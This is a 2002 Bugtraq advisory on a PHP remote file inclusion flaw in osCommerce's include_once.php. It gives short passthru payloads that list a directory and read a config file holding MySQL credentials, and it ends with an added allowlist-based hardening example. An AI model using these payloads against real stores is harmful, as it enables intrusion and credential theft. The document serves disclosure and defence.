Bugtraq mailing list archives

PHP source injection in osCommerce
From: Tim Vandermeerch <Tim.Vandermeersch () pandora be>
Date: 16 Jun 2002 15:36:03 -0000

PHP source injection in osCommerce

Product Description

osCommerce is an open source e-commerce solution under ongoing
development by the open source community. Its feature-packed
out-of-the-box installation allows store owners to set up, run, and
maintain their online stores with minimum effort and with no costs
involved. It can be found at http://www.oscommerce.com

Tested version

Preview Release 2.1 (06/03/2001)
(this is a preview version, but there are a lot of online shops who use 

The Problem

osCommerce comes with a file called /catalog/includes/include_once.php, 
which looks like this:

-------- include_once.php --------
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);

If someone requests a URL like 
include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code 
he wants.

This could be a serious problem because this user could query the SQL 
server and get access to other important files...


-------- Example 1 --------

--- a.php ---
<? passthru("/bin/ls")?>
Output: dir listing of the current directory

-------- Example 2 --------

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
Output: outputs the application_top.php file, which includes MySQL username, 
password, ...

I informed the vendor and hope that they will release a patch soon.

Tim Vandermeersch
Tim.Vandermeersch () pandora be
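
One way to harden the include pattern described in the message above, as an added example that is not osCommerce code or the vendor's patch: the file name is checked against a fixed allowlist and resolved inside a single directory before it is included. The function names, the allowlist entries and the temporary directory are assumptions made for illustration.

```php
<?php
// Added example, not osCommerce code. Names, allowlist and paths are assumptions.
const ALLOWED_INCLUDES = ['application_top.php', 'header.php', 'footer.php'];

// Map a requested name to a real path inside $baseDir, or null if not permitted.
function resolve_include(string $baseDir, string $name): ?string
{
    // Only exact, bare file names from the fixed list are accepted.
    if (!in_array($name, ALLOWED_INCLUDES, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // realpath() follows symlinks, so re-check that the result is still in $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Include the file only when resolve_include() approves it; log every refusal.
function safe_include_once(string $baseDir, string $name): bool
{
    $path = resolve_include($baseDir, $name);
    if ($path === null) {
        error_log('blocked include: ' . var_export($name, true));
        return false;
    }
    include_once $path;
    return true;
}

// Constructed demo: a temporary directory stands in for /catalog/includes/.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('inc_demo_');
mkdir($dir);
file_put_contents("$dir/header.php", "<?php echo \"header loaded\\n\";");

// header.php is listed and present; footer.php is listed but missing;
// the remaining names are not on the list at all.
foreach (['header.php', 'footer.php', 'a.php', '../b.php', '/tmp/a.php'] as $name) {
    $ok = safe_include_once($dir, $name);
    printf("%-12s %s\n", $name, $ok ? 'included' : 'rejected');
}

unlink("$dir/header.php");
rmdir($dir);
```

Only `header.php` is included in the demo; every other name is rejected and written to the PHP error log, which gives operators a record of probing attempts.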
